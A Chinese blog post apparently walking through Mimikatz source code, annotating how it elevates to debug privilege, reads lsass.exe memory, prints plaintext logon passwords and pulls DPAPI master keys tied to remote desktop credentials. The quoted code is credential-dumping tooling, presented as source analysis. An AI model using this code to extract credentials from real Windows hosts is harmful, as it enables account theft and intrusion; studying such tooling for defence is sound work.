【源码阅读】Mimikatz一键获取远程终端凭据与获取明文密码修改方法

1、前言

mimikatz框架是非常精妙的,粗浅讲一下修改的思路。

它的模块主要由各个结构体数组组成,根据传入的命令搜索执行相应命令的模块

mimikatz.c 部分代码:

NTSTATUS mimikatz_doLocal(wchar_t * input)
{
        NTSTATUS status = STATUS_SUCCESS;
        // 参数个数定义
        int argc;
        // 获取输入的值,参数个数赋值
        //
        wchar_t ** argv = CommandLineToArgvW(input, &argc), *module = NULL, *command = NULL, *match;
        unsigned short indexModule, indexCommand;
        BOOL moduleFound = FALSE, commandFound = FALSE;
        
        if(argv && (argc > 0))
        {
                if(match = wcsstr(argv[0], L"::"))
                {
                        if(module = (wchar_t *) LocalAlloc(LPTR, (match - argv[0] + 1) * sizeof(wchar_t)))
                        {
                                if((unsigned int) (match + 2 - argv[0]) < wcslen(argv[0]))
                                        //提取::号的后半段字符
                                        command = match + 2;
                                //将argv[0]源内存块的内容复制到module目标内存块。
                                RtlCopyMemory(module, argv[0], (match - argv[0]) * sizeof(wchar_t));
                        }
                }
                else command = argv[0];
                // 索引值为0,如果moduleFound为1且索引值小于模块的数目,循环执行
                for(indexModule = 0; !moduleFound && (indexModule < ARRAYSIZE(mimikatz_modules)); indexModule++)
                        //查找模块
                        if(moduleFound = (!module || (_wcsicmp(module, mimikatz_modules[indexModule]->shortName) == 0)))
                                //查找命令
                                if(command)
                                        for(indexCommand = 0; !commandFound && (indexCommand < mimikatz_modules[indexModule]->nbCommands); indexCommand++)
                                                if(commandFound = _wcsicmp(command, mimikatz_modules[indexModule]->commands[indexCommand].command) == 0)
                                                        //调用相关模块函数
                                                        status = mimikatz_modules[indexModule]->commands[indexCommand].pCommand(argc - 1, argv + 1);

实际调用模块的方式

//模块调用,对应结构体
const KUHL_M * mimikatz_modules[] = {
        &kuhl_m_standard,
        &kuhl_m_crypto,
        &kuhl_m_sekurlsa,
        &kuhl_m_kerberos,
        &kuhl_m_privilege,
        &kuhl_m_process,
        &kuhl_m_service,
        &kuhl_m_lsadump,
        &kuhl_m_ts,
        &kuhl_m_event,
        &kuhl_m_misc,
        &kuhl_m_token,
        &kuhl_m_vault,
        &kuhl_m_minesweeper,
#ifdef NET_MODULE
        &kuhl_m_net,
#endif
        &kuhl_m_dpapi,
        &kuhl_m_busylight,
        &kuhl_m_sysenv,
        &kuhl_m_sid,
        &kuhl_m_iis,
        &kuhl_m_rpc,
};

如果要添加各种变量作为功能模块。在打开解决方案后,global files目录中的globals.h文件可以添加你设置的全局变量,实现全局调用。

提权函数部分

//提权函数调用
NTSTATUS kuhl_m_privilege_debug(int argc, wchar_t * argv[])
{
        return kuhl_m_privilege_simple(SE_DEBUG);
}

主要用更底层的函数,一行API实现进程提权。

NTSTATUS kuhl_m_privilege_simple(ULONG privId)
{
        ULONG previousState;
        NTSTATUS status;
        //提升权限
        //  RtlAdjustPrivilege(SE_DEBUG, TRUE, FALSE, &previousState);
        status = RtlAdjustPrivilege(privId, TRUE, FALSE, &previousState);
        if(NT_SUCCESS(status))
                kprintf(L"Privilege \'%u\' OK\n", privId);
        else
                PRINT_ERROR(L"RtlAdjustPrivilege (%u) %08x\n", privId, status);
        return status;
}

明文获取密码部分

NTSTATUS kuhl_m_sekurlsa_getLogonData(const PKUHL_M_SEKURLSA_PACKAGE * lsassPackages, ULONG nbPackages)
{
        KUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA OptionalData = {lsassPackages, nbPackages};
        return kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_logondata, &OptionalData);  //明文获取密码2
}

通过调试跟进,发现是从lsass.exe中dump出内存

        //根据版本指定调用进程优先级别的函数
        DWORD processRights = PROCESS_VM_READ | ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? PROCESS_QUERY_INFORMATION : PROCESS_QUERY_LIMITED_INFORMATION);
        BOOL isError = FALSE;

        if(!cLsass.hLsassMem)
        {
                status = STATUS_NOT_FOUND;
                if(NT_SUCCESS(lsassLocalHelper->initLocalLib()))
                {
                        if(pMinidumpName)
                        {
                                Type = KULL_M_MEMORY_TYPE_PROCESS_DMP;
                                kprintf(L"Opening : \'%s\' file for minidump...\n", pMinidumpName);
                                hData = CreateFile(pMinidumpName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
                        }
                        else
                        {
                                Type = KULL_M_MEMORY_TYPE_PROCESS;
                                if(kull_m_process_getProcessIdForName(L"lsass.exe", &pid))
                                        hData = OpenProcess(processRights, FALSE, pid); //打开进程
                                else PRINT_ERROR(L"LSASS process not found (?)\n");
                        }

在NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData)的回调函数中输出已经获取的明文数据

                                                        //回传数据
                                                        retCallback = callback(&sessionData, pOptionalData); //明文密码获取3

明文密码打印位置

BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
{
        PKUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA pLsassData = (PKUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA) pOptionalData;
        ULONG i;
        //PDWORD sub = NULL;
        if((pData->LogonType != Network)/* && pData->LogonType != UndefinedLogonType*/)
        {
                //if(IsValidSid(pData->pSid) && GetSidSubAuthorityCount(pData->pSid))
                //        sub = GetSidSubAuthority(pData->pSid, 0);

                //if(!sub || (*sub != 90 && *sub != 96))
                //{ 
                        //这个函数负责获取需要打印的数据
                        kuhl_m_sekurlsa_printinfos_logonData(pData);
                       //循环输出
                        for(i = 0; i < pLsassData->nbPackages; i++)
                        {
                                if(pLsassData->lsassPackages[i]->Module.isPresent && lsassPackages[i]->isValid)
                                {
                                        kprintf(L"\t%s :\t", pLsassData->lsassPackages[i]->Name);
                                        pLsassData->lsassPackages[i]->CredsForLUIDFunc(pData);
                                        kprintf(L"\n");
                                }
                        }
                //}
        }
        return TRUE;
}

获取远程会话终端凭据部分

NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[])
{
        kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_dpapi, NULL); //获取全部用户Guid
        return STATUS_SUCCESS;
}

在BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)处是存储会话的Guid和MasterKey所在的位置。


                        if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_MASTERKEY_CACHE_ENTRY)))
                                        {
                                                if(SecEqualLuid(pData->LogonId, &mesCredentials.LogonId))
                                                {
                                                        kprintf(L"\t [%08x]\n\t * GUID      :\t", monNb++);
                                                        kull_m_string_displayGUID(&mesCredentials.KeyUid); //获取Guid

                                                        kprintf(L"\n\t * Time      :\t"); kull_m_string_displayLocalFileTime(&mesCredentials.insertTime);

                                                        if(aKey.address = LocalAlloc(LPTR, mesCredentials.keySize))
                                                        {
                                                                aLsass.address = (PBYTE) aLsass.address + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key);
                                                                if(kull_m_memory_copy(&aKey, &aLsass, mesCredentials.keySize))
                                                                {
                                                                        (*pData->lsassLocalHelper->pLsaUnprotectMemory)(aKey.address, mesCredentials.keySize);
                                                                        kprintf(L"\n\t * MasterKey :\t"); kull_m_string_wprintf_hex(aKey.address, mesCredentials.keySize, 0);  //获取MasterKey
.....

2、效果图

执行多条命令

批量对比

posted @ 2018-02-16 14:38  17bdw  阅读(1357)  评论(0编辑  收藏  举报